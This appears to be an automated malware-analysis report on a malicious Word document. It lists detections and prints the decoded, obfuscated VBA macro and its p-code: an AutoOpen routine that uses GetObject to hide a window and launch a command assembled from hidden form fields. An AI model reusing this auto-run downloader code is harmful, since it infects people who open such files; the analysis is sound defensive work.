MALICIOUS
250
Risk Score
Heuristics 8
-
ClamAV: Doc.Downloader.00536d-6922084-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.00536d-6922084-0
-
Malformed OLE auto-open stager with embedded ZIP payload critical OLE_RAW_MALFORMED_AUTOOPEN_STAGERRaw malformed OLE bytes contain an auto-open macro entry, embedded ZIP/theme package bytes, VBA project metadata, and URL/CMD/Shell staging tokens. This is a high-confidence exploit-builder shape where the OLE directory is intentionally malformed, preventing normal VBA extraction while leaving the auto-run stager visible in raw streams.
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
Set wQoD1ZUA = GetObject(mo_QUCU.wUxkko + zAUQUA1.PXAXkwo + mo_QUCU.wUxkko.ControlTipText) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub autoopen() -
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 22221 bytes |
SHA-256: 13e222a0f0ef7636c0f3653edd8e1d3eb00eba4db87a04b45ad76582b2ef2feb |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "FXAAUUAB"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "mo_QUCU"
Attribute VB_Base = "0{CD6805E5-8764-4627-8481-81F349424677}{EE6B9F54-C1D7-465E-87A0-CEB2D7BAD9AB}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "zAUQUA1"
Attribute VB_Base = "0{51BE674A-4D44-4B34-96A1-A44D43340DE5}{E1781B50-6584-46B4-A9F3-ED89359259F4}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "YoXQA4"
Function uGcAwB()
If 954234842 = 623926956 Then
nDAxBQDA = 562512417 - Atn(995007548) / 98567874 / 57720412 * 104824051 - Rnd(AACAGA / CSng(915297871))
txQ_Qko1 = z_oD4A1A + Tan(168074055) * IAGUUQx - sB1GkBQ4 + (671073863 * 427528300)
End If
If 133300418 = 313179367 Then
nAwwAcCk = 145027019 - Atn(869342457) / 438135236 / 357184372 * 690765252 - Rnd(D_AAAAX / CSng(719198065))
VDAAAkC = Po4ABUCG + Tan(88185581) * rGUADGc - hBABGZAk + (486084587 * 390129124)
End If
If 727611335 = 884351044 Then
IU4xADU = 751139596 - Atn(864456515) / 544151790 / 504894783 * 543869322 - Rnd(BcAQUB4o / CSng(129802369))
lUcACAUA = l1DBXxUA + Tan(4344079) * CXAQwXX - PBAAAGAA + (900083805 * 748228244)
End If
End Function
Sub autoopen()
CAAAX_X
End Sub
Function CAAAX_X()
On Error Resume Next
If 311781104 = 614520040 Then
RAAAAZA = 658600962 - Atn(507437951) / 390283147 / 327326000 * 555245021 - Rnd(EAUBUDCU / CSng(231796796))
XADDCUw = ikDAXAA + Tan(814511031) * zBDxAw - uCBCwXD + (599383606 * 197702307)
End If
If 192521223 = 398137964 Then
JADAAXAk = 352270834 - Atn(642337229) / 25370581 / 44539796 * 342154251 - Rnd(RwABDwxA / CSng(698157259))
BDQ4AZcA = doAUQCBQ + Tan(985452927) * G_BQkAx - VGwDAU + (321509322 * 750719161)
End If
Set wQoD1ZUA = GetObject(mo_QUCU.wUxkko + zAUQUA1.PXAXkwo + mo_QUCU.wUxkko.ControlTipText)
If 99247234 = 694219034 Then
DBkZoUAc = 209844616 - Atn(641804525) / 48730964 / 89661484 * 240312150 - Rnd(lAAo1AAX / CSng(774257021))
M1CAQU1A = CxCZAGZ + Tan(641688001) * l4AQZGBo - hDcA_QxC + (102480350 * 639037287)
End If
If 495581778 = 958501141 Then
QUAwx_Q = 92265627 - Atn(947920079) / 184839175 / 510788531 * 509551362 - Rnd(pZkQkB / CSng(299446544))
CA11AU = wxUACGA + Tan(92313236) * jB1DUBC - iUADXD + (622690051 * 676865591)
End If
If 82866246 = 495707746 Then
XoUAQB = 342530488 - Atn(298540636) / 120247757 / 101600389 * 749192648 - Rnd(WADDDQ / CSng(898417652))
iADZAG = LAkAAA + Tan(225238488) * cxAGoA - OBA_AUB + (535912738 * 128107355)
End If
If 922403 = 922403 Then
If 441773021 = 58539964 Then
fAAAUB = 163192969 - Atn(218325232) / 444768466 / 990981723 * 996148065 - Rnd(PZxAAo / CSng(419634362))
EA_C11 = iAAAABU + Tan(170542457) * iA_AAA_A - VAXcBQU + (990938202 * 973553041)
End If
If 600338659 = 737130807 Then
T_DUAA = 927171026 - Atn(270359631) / 77822336 / 658776429 * 930654631 - Rnd(uAAU4D / CSng(750410525))
nGABQwA = AoUBXAUo + Tan(941273226) * jAQUZ1 - BcGCAoUA + (643644574 * 948978236)
End If
If 616876837 = 911967604 Then
oBADwGA = 433590315 - Atn(122993190) / 54730617 / 134767080 * 913716336 - Rnd(DcA_QBAA / CSng(141361895))
qAXAABB = hBx_AB + Tan(391952498) * OQ_DCo - HUAAoA1A + (396564851 * 238719972)
End If
wQoD1ZUA. _
ShOwWiNdOw = mo_QUCU.tDGAGCA - mo_QUCU.tDGAGCA + mo_QUCU.tDGAGCA + mo_QUCU.tDGAGCA + mo_QUCU.tDGAGCA
If 582471378 = 581594468 Then
bDBBQAAG = 879461322 - Atn(577312216) / 817413477 / 890491562 * 197033146 - Rnd(hQAAAAA / CSng(123683436))
jAc4xAAA = BDAU1A + Tan(462730670) * WAkAZw - QUCDAAQo + (671059512 * 83991779)
End If
If 680784917 = 591295986 Then
iAoGkw1 = 376549980 - Atn(794939078) / 948893164 / 915877549 * 273881348 - Rnd(wAUAxAG / CSng(906652974))
aAGAQ_Aw = vQQUBAD + Tan(959235939) * WcGc_Aw - NQAGAXo + (525374904 * 844432658)
End If
If 862861950 = 281937868 Then
BkAQxZAA = 411812142 - Atn(840728003) / 379527232 / 797592510 * 92537444 - Rnd(iUGQAB / CSng(3107940))
ic_QGUGA = l1oQ1AUc + Tan(232855211) * nAUBA_XZ - B4DCAxAc + (719986557 * 173388978)
End If
End If
If 291366871 = 490153523 Then
C4wwo___ = 252579880 - Atn(735410577) / 32142996 / 959549389 * 109895599 - Rnd(owAckx / CSng(592412823))
vAkoxcU = wAABx_A + Tan(52342627) * PwCAAADQ - qQ_QB1A + (336178099 * 583974682)
End If
If 759817572 = 183916178 Then
F1AAGQ = 834607417 - Atn(257384076) / 602448081 / 644838689 * 536907635 - Rnd(LXUGQCA / CSng(439169726))
jDkBDx = FcQABAG + Tan(115600113) * AZU4o_ - FxcwAAQA + (123167214 * 53219542)
End If
If 828922905 = 916845351 Then
PAABXDA = 220526335 - Atn(436020096) / 405485989 / 103106524 * 83623623 - Rnd(zAAAAAXX / CSng(141371181))
mGUAoQAX = rw4UAxA + Tan(312065087) * wAQAxk - cwkkXA_A + (748913093 * 567769503)
End If
Call GetObject(mo_QUCU.wUxkko + zAUQUA1.jZUUBG + mo_QUCU.wUxkko.ControlSource).Create((mo_QUCU.wUxkko.ControlSource + zAUQUA1.LDBBDXAD + mo_QUCU.wUxkko.ControlTipText + zAUQUA1.VUAAUB + mo_QUCU.wUxkko.Text + mo_QUCU.wUxkko.Text + zAUQUA1.IADAUD + mo_QUCU.wUxkko.Text + mo_QUCU.wUxkko.ControlSource + zAUQUA1.PUADZAUC + mo_QUCU.wUxkko.Text + zAUQUA1.zAAAAQ + mo_QUCU.wUxkko.ControlSource), MBk4DC, wQoD1ZUA, mo_QUCU.wUxkko)
If 148640943 = 707561943 Then
kU4BUAw = 575244137 - Atn(896394129) / 662824139 / 155012048 * 793603706 - Rnd(wBkoAU / CSng(384994988))
sAD_xA = FwxA4A + Tan(242506423) * VAc4_AAA - q1BQkC + (488784631 * 745808767)
End If
If 97524382 = 106885034 Then
cUZoUAA1 = 135431235 - Atn(543494653) / 31490200 / 776331261 * 23331326 - Rnd(z_ABUAA / CSng(400832936))
V1AABA = pAAAAD + Tan(982507171) * qAAQ_A - XCQAAAc + (320010426 * 768521826)
End If
End Function
Function N1ZcQwCA()
If 743516023 = 93136766 Then
P_A_kUGc = 191140968 - Atn(94663256) / 450551735 / 693764033 * 482277072 - Rnd(RXcXA4C / CSng(595455676))
boU1o1QQ = VABwBxD + Tan(728837693) * pXXkXU - UDDBDB4B + (986674917 * 674616190)
End If
If 300447647 = 478864410 Then
zA_AUCAD = 142753412 - Atn(233119437) / 608065800 / 429229011 * 770026689 - Rnd(FAAAA1 / CSng(622881510))
XoAcABBA = nBckAA + Tan(110435685) * IBkBAGDA - SADA4oA + (808443025 * 59670263)
End If
End Function
' Processing file: /opt/analyzer/scan_staging/01ebfc772af2491d8f08cc2f94c19bba.bin
' ===============================================================================
' Module streams:
' Macros/VBA/FXAAUUAB - 1106 bytes
' Macros/VBA/mo_QUCU - 1156 bytes
' Macros/VBA/zAUQUA1 - 1156 bytes
' Macros/VBA/YoXQA4 - 9855 bytes
' Line #0:
' FuncDefn (Function YoXQA4())
' Line #1:
' LitDI4 0x77DA 0x38E0
' LitDI4 0x5EAC 0x2530
' Eq
' IfBlock
' Line #2:
' LitDI4 0x4221 0x2187
' LitDI4 0x9C3C 0x3B4E
' ArgsLd Atn 0x0001
' LitDI4 0x06C2 0x05E0
' Div
' LitDI4 0xBE5C 0x0370
' Div
' LitDI4 0x7CF3 0x063F
' Mul
' Sub
' Ld nDAxBQDA
' LitDI4 0x564F 0x368E
' Coerce (Sng)
' Div
' ArgsLd Rnd 0x0001
' Sub
' St uGcAwB
' Line #3:
' Ld txQ_Qko1
' LitDI4 0x9B47 0x0A04
' ArgsLd Tan 0x0001
' Ld z_oD4A1A
' Mul
' Add
' Ld IAGUUQx
' Sub
' LitDI4 0xC647 0x27FF
' LitDI4 0x906C 0x197B
' Mul
' Paren
' Add
' St AACAGA
' Line #4:
' EndIfBlock
' Line #5:
' LitDI4 0x00C2 0x07F2
' LitDI4 0xBCE7 0x12AA
' Eq
' IfBlock
' Line #6:
' LitDI4 0xEFCB 0x08A4
' LitDI4 0x1CF9 0x33D1
' ArgsLd Atn 0x0001
' LitDI4 0x69C4 0x1A1D
' Div
' LitDI4 0x3374 0x154A
' Div
' LitDI4 0x3DC4 0x292C
' Mul
' Sub
' Ld nAwwAcCk
' LitDI4 0x1771 0x2ADE
' Coerce (Sng)
' Div
' ArgsLd Rnd 0x0001
' Sub
' St sB1GkBQ4
' Line #7:
' Ld VDAAAkC
' LitDI4 0x9AED 0x0541
' ArgsLd Tan 0x0001
' Ld Po4ABUCG
' Mul
' Add
' Ld rGUADGc
' Sub
' LitDI4 0x0FEB 0x1CF9
' LitDI4 0xE5E4 0x1740
' Mul
' Paren
' Add
' St D_AAAAX
' Line #8:
' EndIfBlock
' Line #9:
' LitDI4 0x77C7 0x2B5E
' LitDI4 0x2044 0x34B6
' Eq
' IfBlock
' Line #10:
' LitDI4 0x7B0C 0x2CC5
' LitDI4 0x8F43 0x3386
' ArgsLd Atn 0x0001
' LitDI4 0x18EE 0x206F
' Div
' LitDI4 0x153F 0x1E18
' Div
' LitDI4 0xC98A 0x206A
' Mul
' Sub
' Ld IU4xADU
' LitDI4 0xA081 0x07BC
' Coerce (Sng)
' Div
' ArgsLd Rnd 0x0001
' Sub
' St hBABGZAk
' Line #11:
' Ld lUcACAUA
' LitDI4 0x490F 0x0042
' ArgsLd Tan 0x0001
' Ld l1DBXxUA
' Mul
' Add
' Ld CXAQwXX
' Sub
' LitDI4 0x305D 0x35A6
' LitDI4 0x0E94 0x2C99
' Mul
' Paren
' Add
' St BcAQUB4o
' Line #12:
' EndIfBlock
' Line #13:
' EndFunc
' Line #14:
' FuncDefn (Sub PBAAAGAA())
' Line #15:
' ArgsCall autoopen 0x0000
' Line #16:
' EndSub
' Line #17:
' FuncDefn (Function autoopen())
' Line #18:
' OnError (Resume Next)
' Line #19:
' LitDI4 0x66F0 0x1295
' LitDI4 0xD4E8 0x24A0
' Eq
' IfBlock
' Line #20:
' LitDI4 0x7402 0x2741
' LitDI4 0xE37F 0x1E3E
' ArgsLd Atn 0x0001
' LitDI4 0x3F8B 0x1743
' Div
' LitDI4 0x9930 0x1382
' Div
' LitDI4 0x5DDD 0x2118
' Mul
' Sub
' Ld RAAAAZA
' LitDI4 0xF03C 0x0DD0
' Coerce (Sng)
' Div
' ArgsLd Rnd 0x0001
' Sub
' St CAAAX_X
' Line #21:
' Ld XADDCUw
' LitDI4 0x73B7 0x308C
' ArgsLd Tan 0x0001
' Ld ikDAXAA
' Mul
' Add
' Ld zBDxAw
' Sub
' LitDI4 0xDE36 0x23B9
' LitDI4 0xB2A3 0x0BC8
' Mul
' Paren
' Add
' St EAUBUDCU
' Line #22:
' EndIfBlock
' Line #23:
' LitDI4 0xA407 0x0B79
' LitDI4 0x1A6C 0x17BB
' Eq
' IfBlock
' Line #24:
' LitDI4 0x39F2 0x14FF
' LitDI4 0x49CD 0x2649
' ArgsLd Atn 0x0001
' LitDI4 0x1FD5 0x0183
' Div
' LitDI4 0x9F94 0x02A7
' Div
' LitDI4 0xDC0B 0x1464
' Mul
' Sub
' Ld JADAAXAk
' LitDI4 0x08CB 0x299D
' Coerce (Sng)
' Div
' ArgsLd Rnd 0x0001
' Sub
' St uCBCwXD
' Line #25:
' Ld BDQ4AZcA
' LitDI4 0xD17F 0x3ABC
' ArgsLd Tan 0x0001
' Ld doAUQCBQ
' Mul
' Add
' Ld G_BQkAx
' Sub
' LitDI4 0xD7CA 0x1329
' LitDI4 0x10B9 0x2CBF
' Mul
' Paren
' Add
' St RwABDwxA
' Line #26:
' EndIfBlock
' Line #27:
' SetStmt
' Ld zAUQUA1
' MemLd GetObject
' Ld MSForms
' MemLd wUxkko
' Add
' Ld zAUQUA1
' MemLd GetObject
' MemLd ControlTipText
' Add
' ArgsLd wQoD1ZUA 0x0001
' Set VGwDAU
' Line #28:
' LitDI4 0x6482 0x05EA
' LitDI4 0xF11A 0x2960
' Eq
' IfBlock
' Line #29:
' LitDI4 0xF988 0x0C81
' LitDI4 0x28ED 0x2641
' ArgsLd Atn 0x0001
' LitDI4 0x9354 0x02E7
' Div
' LitDI4 0x202C 0x0558
' Div
' LitDI4 0xDF56 0x0E52
' Mul
' Sub
' Ld DBkZoUAc
' LitDI4 0x397D 0x2E26
' Coerce (Sng)
' Div
' ArgsLd Rnd 0x0001
' Sub
' St PXAXkwo
' Line #30:
' Ld M1CAQU1A
' LitDI4 0x61C1 0x263F
' ArgsLd Tan 0x0001
' Ld CxCZAGZ
' Mul
' Add
' Ld l4AQZGBo
' Sub
' LitDI4 0xB9DE 0x061B
' LitDI4 0xEF67 0x2616
' Mul
' Paren
' Add
' St lAAo1AAX
' Line #31:
' EndIfBlock
' Line #32:
' LitDI4 0xFA52 0x1D89
' LitDI4 0x9115 0x3921
' Eq
' IfBlock
' Line #33:
' LitDI4 0xDC9B 0x057F
' LitDI4 0x1CCF 0x3880
' ArgsLd Atn 0x0001
' LitDI4 0x6C07 0x0B04
' Div
' LitDI4 0x03B3 0x1E72
' Div
' LitDI4 0x2302 0x1E5F
' Mul
' Sub
' Ld QUAwx_Q
' LitDI4 0x3110 0x11D9
' Coerce (Sng)
' Div
' ArgsLd Rnd 0x0001
' Sub
' St hDcA_QxC
' Line #34:
' Ld CA11AU
' LitDI4 0x9694 0x0580
' ArgsLd Tan 0x0001
' Ld wxUACGA
' Mul
' Add
' Ld jB1DUBC
' Sub
' LitDI4 0x7F03 0x251D
' LitDI4 0x2637 0x2858
' Mul
' Paren
' Add
' St pZkQkB
' Line #35:
' EndIfBlock
' Line #36:
' LitDI4 0x7046 0x04F0
' LitDI4 0xE662 0x1D8B
' Eq
' IfBlock
' Line #37:
' LitDI4 0x99B8 0x146A
' LitDI4 0x5E5C 0x11CB
' ArgsLd Atn 0x0001
' LitDI4 0xD5CD 0x072A
' Div
' LitDI4 0x4C85 0x060E
' Div
' LitDI4 0xC5C8 0x2CA7
' Mul
' Sub
' Ld XoUAQB
' LitDI4 0xC3F4 0x358C
' Coerce (Sng)
' Div
' ArgsLd Rnd 0x0001
' Sub
' St iUADXD
' Line #38:
' Ld iADZAG
' LitDI4 0xDDD8 0x0D6C
' ArgsLd Tan 0x0001
' Ld LAkAAA
' Mul
' Add
' Ld cxAGoA
' Sub
' LitDI4 0x6122 0x1FF1
' LitDI4 0xC35B 0x07A2
' Mul
' Paren
' Add
' St WADDDQ
' Line #39:
' EndIfBlock
' Line #40:
' LitDI4 0x1323 0x000E
' LitDI4 0x1323 0x000E
' Eq
' IfBlock
' Line #41:
' LitDI4 0xEBDD 0x1A54
' LitDI4 0x3FBC 0x037D
' Eq
' IfBlock
' Line #42:
' LitDI4 0x2089 0x09BA
' LitDI4 0x60F0 0x0D03
' ArgsLd Atn 0x0001
' LitDI4 0xA0D2 0x1A82
' Div
' LitDI4 0x2E5B 0x3B11
' Div
' LitDI4 0x0361 0x3B60
' Mul
' Sub
' Ld fAAAUB
' LitDI4 0x1CBA 0x1903
' Coerce (Sng)
' Div
' ArgsLd Rnd 0x0001
' Sub
' St OBA_AUB
' Line #43:
' Ld EA_C11
' LitDI4 0x4579 0x0A2A
' ArgsLd Tan 0x0001
' Ld iAAAABU
' Mul
' Add
' Ld iA_AAA_A
' Sub
' LitDI4 0x845A 0x3B10
' LitDI4 0x3D91 0x3A07
' Mul
' Paren
' Add
' St PZxAAo
' Line #44:
' EndIfBlock
' Line #45:
' LitDI4 0x70E3 0x23C8
' LitDI4 0xB937 0x2BEF
' Eq
' IfBlock
' Line #46:
' LitDI4 0x81D2 0x3743
' LitDI4 0x5C4F 0x101D
' ArgsLd Atn 0x0001
' LitDI4 0x7980 0x04A3
' Div
' LitDI4 0x216D 0x2744
' Div
' LitDI4 0xA9A7 0x3778
' Mul
' Sub
' Ld T_DUAA
' LitDI4 0x5B1D 0x2CBA
' Coerce (Sng)
' Div
' ArgsLd Rnd 0x0001
' Sub
' St VAXcBQU
' Line #47:
' Ld nGABQwA
' LitDI4 0xB08A 0x381A
' ArgsLd Tan 0x0001
' Ld AoUBXAUo
' Mul
' Add
' Ld jAQUZ1
' Sub
' LitDI4 0x3C9E 0x265D
' LitDI4 0x423C 0x3890
' Mul
' Paren
' Add
' St uAAU4D
' Line #48:
' EndIfBlock
' Line #49:
' LitDI4 0xCB25 0x24C4
' LitDI4 0x8574 0x365B
' Eq
' IfBlock
' Line #50:
' LitDI4 0x102B 0x19D8
' LitDI4 0xBA26 0x0754
' ArgsLd Atn 0x0001
' LitDI4 0x1F79 0x0343
' Div
' LitDI4 0x61E8 0x0808
' Div
' LitDI4 0x3470 0x3676
' Mul
' Sub
' Ld oBADwGA
' LitDI4 0x02E7 0x086D
' Coerce (Sng)
' Div
' ArgsLd Rnd 0x0001
' Sub
' St BcGCAoUA
' Line #51:
' Ld qAXAABB
' LitDI4 0xB872 0x175C
' ArgsLd Tan 0x0001
' Ld hBx_AB
' Mul
' Add
' Ld OQ_DCo
' Sub
' LitDI4 0x1973 0x17A3
' LitDI4 0x93E4 0x0E3A
' Mul
' Paren
' Add
' St DcA_QBAA
' Line #52:
' EndIfBlock
' Line #53:
' LineCont 0x0004 02 00 00 00
' Ld zAUQUA1
' MemLd ShOwWiNdOw
' Ld zAUQUA1
' MemLd ShOwWiNdOw
' Sub
' Ld zAUQUA1
' MemLd ShOwWiNdOw
' Add
' Ld zAUQUA1
' MemLd ShOwWiNdOw
' Add
' Ld zAUQUA1
' MemLd ShOwWiNdOw
' Add
' Ld VGwDAU
' MemSt HUAAoA1A
' Line #54:
' LitDI4 0xCED2 0x22B7
' LitDI4 0x6D64 0x22AA
' Eq
' IfBlock
' Line #55:
' LitDI4 0x83CA 0x346B
' LitDI4 0x15D8 0x2269
' ArgsLd Atn 0x0001
' LitDI4 0xBD65 0x30B8
' Div
' LitDI4 0xD2AA 0x3513
' Div
' LitDI4 0x7CBA 0x0BBE
' Mul
' Sub
' Ld bDBBQAAG
' LitDI4 0x426C 0x075F
' Coerce (Sng)
' Div
' ArgsLd Rnd 0x0001
' Sub
' St tDGAGCA
' Line #56:
' Ld jAc4xAAA
' LitDI4 0xB5AE 0x1B94
' ArgsLd Tan 0x0001
' Ld BDAU1A
' Mul
' Add
' Ld WAkAZw
' Sub
' LitDI4 0x8E38 0x27FF
' LitDI4 0x9CE3 0x0501
' Mul
' Paren
' Add
' St hQAAAAA
' Line #57:
' EndIfBlock
' Line #58:
' LitDI4 0xF415 0x2893
' LitDI4 0x75F2 0x233E
' Eq
' IfBlock
' Line #59:
' LitDI4 0xB25C 0x1671
' LitDI4 0xCEC6 0x2F61
' ArgsLd Atn 0x0001
' LitDI4 0xF5EC 0x388E
' Div
' LitDI4 0x2EAD 0x3697
' Div
' LitDI4 0x1904 0x1053
' Mul
' Sub
' Ld iAoGkw1
' LitDI4 0x6D2E 0x360A
' Coerce (Sng)
' Div
' ArgsLd Rnd 0x0001
' Sub
' St QUCDAAQo
' Line #60:
' Ld aAGAQ_Aw
' LitDI4 0xC763 0x392C
' ArgsLd Tan 0x0001
' Ld vQQUBAD
' Mul
' Add
' Ld WcGc_Aw
' Sub
' LitDI4 0x95B8 0x1F50
' LitDI4 0x0512 0x3255
' Mul
' Paren
' Add
' St wAUAxAG
' Line #61:
' EndIfBlock
' Line #62:
' LitDI4 0x3A7E 0x336E
' LitDI4 0x07CC 0x10CE
' Eq
' IfBlock
' Line #63:
' LitDI4 0xC12E 0x188B
' LitDI4 0x7DC3 0x321C
' ArgsLd Atn 0x0001
' LitDI4 0x2040 0x169F
' Div
' LitDI4 0x4BBE 0x2F8A
' Div
' LitDI4 0x0264 0x0584
' Mul
' Sub
' Ld BkAQxZAA
' LitDI4 0x6C64 0x002F
' Coerce (Sng)
' Div
' ArgsLd Rnd 0x0001
' Sub
' St NQAGAXo
' Line #64:
' Ld ic_QGUGA
' LitDI4 0x16AB 0x0DE1
' ArgsLd Tan 0x0001
' Ld l1oQ1AUc
' Mul
' Add
' Ld nAUBA_XZ
' Sub
' LitDI4 0x1F7D 0x2AEA
' LitDI4 0xB4B2 0x0A55
' Mul
' Paren
' Add
' St iUGQAB
' Line #65:
' EndIfBlock
' Line #66:
' EndIfBlock
' Line #67:
' LitDI4 0xE7D7 0x115D
' LitDI4 0x2633 0x1D37
' Eq
' IfBlock
' Line #68:
' LitDI4 0x1028 0x0F0E
' LitDI4 0x7991 0x2BD5
' ArgsLd Atn 0x0001
' LitDI4 0x7694 0x01EA
' Div
' LitDI4 0x8FCD 0x3931
' Div
' LitDI4 0xDFAF 0x068C
' Mul
' Sub
' Ld C4wwo___
' LitDI4 0x8097 0x234F
' Coerce (Sng)
' Div
' ArgsLd Rnd 0x0001
' Sub
' St B4DCAxAc
' Line #69:
' Ld vAkoxcU
' LitDI4 0xAF63 0x031E
' ArgsLd Tan 0x0001
' Ld wAABx_A
' Mul
' Add
' Ld PwCAAADQ
' Sub
' LitDI4 0xABB3 0x1409
' LitDI4 0xBF1A 0x22CE
' Mul
' Paren
' Add
' St owAckx
' Line #70:
' EndIfBlock
' Line #71:
' LitDI4 0xE564 0x2D49
' LitDI4 0x5692 0x0AF6
' Eq
' IfBlock
' Line #72:
' LitDI4 0x1939 0x31BF
' LitDI4 0x5E8C 0x0F57
' ArgsLd Atn 0x0001
' LitDI4 0xA0D1 0x23E8
' Div
' LitDI4 0x7521 0x266F
' Div
' LitDI4 0x8F73 0x2000
' Mul
' Sub
' Ld F1AAGQ
' LitDI4 0x32BE 0x1A2D
' Coerce (Sng)
' Div
' ArgsLd Rnd 0x0001
' Sub
' St qQ_QB1A
' Line #73:
' Ld jDkBDx
' LitDI4 0xEAF1 0x06E3
' ArgsLd Tan 0x0001
' Ld FcQABAG
' Mul
' Add
' Ld AZU4o_
' Sub
' LitDI4 0x61EE 0x0757
' LitDI4 0x10D6 0x032C
' Mul
' Paren
' Add
' St LXUGQCA
' Line #74:
' EndIfBlock
' Line #75:
' LitDI4 0x5C19 0x3168
' LitDI4 0xF327 0x36A5
' Eq
' IfBlock
' Line #76:
' LitDI4 0xF6FF 0x0D24
' LitDI4 0x2380 0x19FD
' ArgsLd Atn 0x0001
' LitDI4 0x39A5 0x182B
' Div
' LitDI4 0x47DC 0x0625
' Div
' LitDI4 0xFEC7 0x04FB
' Mul
' Sub
' Ld PAABXDA
' LitDI4 0x272D 0x086D
' Coerce (Sng)
' Div
' ArgsLd Rnd 0x0001
' Sub
' St FxcwAAQA
' Line #77:
' Ld mGUAoQAX
' LitDI4 0xBC3F 0x1299
' ArgsLd Tan 0x0001
' Ld rw4UAxA
' Mul
' Add
' Ld wAQAxk
' Sub
' LitDI4 0x81C5 0x2CA3
' LitDI4 0x799F 0x21D7
' Mul
' Paren
' Add
' St zAAAAAXX
' Line #78:
' EndIfBlock
' Line #79:
' Ld zAUQUA1
' MemLd GetObject
' MemLd jZUUBG
' Ld MSForms
' MemLd Create
' Add
' Ld zAUQUA1
' MemLd GetObject
' MemLd ControlTipText
' Add
' Ld MSForms
' MemLd LDBBDXAD
' Add
' Ld zAUQUA1
' MemLd GetObject
' MemLd Text
' Add
' Ld zAUQUA1
' MemLd GetObject
' MemLd Text
' Add
' Ld MSForms
' MemLd VUAAUB
' Add
' Ld zAUQUA1
' MemLd GetObject
' MemLd Text
' Add
' Ld zAUQUA1
' MemLd GetObject
' MemLd jZUUBG
' Add
' Ld MSForms
' MemLd IADAUD
' Add
' Ld zAUQUA1
' MemLd GetObject
' MemLd Text
' Add
' Ld MSForms
' MemLd PUADZAUC
' Add
' Ld zAUQUA1
' MemLd GetObject
' MemLd jZUUBG
' Add
' Paren
' Ld zAAAAQ
' Ld VGwDAU
' Ld zAUQUA1
' MemLd GetObject
' Ld zAUQUA1
' MemLd GetObject
' Ld MSForms
' MemLd cwkkXA_A
' Add
' Ld zAUQUA1
' MemLd GetObject
' MemLd jZUUBG
' Add
' ArgsLd wQoD1ZUA 0x0001
' ArgsMemCall (Call) ControlSource 0x0004
' Line #80:
' LitDI4 0x14AF 0x08DC
' LitDI4 0x89D7 0x2A2C
' Eq
' IfBlock
' Line #81:
' LitDI4 0x8769 0x2249
' LitDI4 0xE391 0x356D
' ArgsLd Atn 0x0001
' LitDI4 0xE4CB 0x2781
' Div
' LitDI4 0x4BD0 0x093D
' Div
' LitDI4 0x6E7A 0x2F4D
' Mul
' Sub
' Ld kU4BUAw
' LitDI4 0x8EAC 0x16F2
' Coerce (Sng)
' Div
' ArgsLd Rnd 0x0001
' Sub
' St MBk4DC
' Line #82:
' Ld sAD_xA
' LitDI4 0x5AB7 0x0E74
' ArgsLd Tan 0x0001
' Ld FwxA4A
' Mul
' Add
' Ld VAc4_AAA
' Sub
' LitDI4 0x42F7 0x1D22
' LitDI4 0x237F 0x2C74
' Mul
' Paren
' Add
' St wBkoAU
' Line #83:
' EndIfBlock
' Line #84:
' LitDI4 0x1A9E 0x05D0
' LitDI4 0xEFAA 0x065E
' Eq
' IfBlock
' Line #85:
' LitDI4 0x8443 0x0812
' LitDI4 0x11FD 0x2065
' ArgsLd Atn 0x0001
' LitDI4 0x8098 0x01E0
' Div
' LitDI4 0xDFFD 0x2E45
' Div
' LitDI4 0x01FE 0x0164
' Mul
' Sub
' Ld cUZoUAA1
' LitDI4 0x39A8 0x17E4
' Coerce (Sng)
' Div
' ArgsLd Rnd 0x0001
' Sub
' St q1BQkC
' Line #86:
' Ld V1AABA
' LitDI4 0xDEA3 0x3A8F
' ArgsLd Tan 0x0001
' Ld pAAAAD
…
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.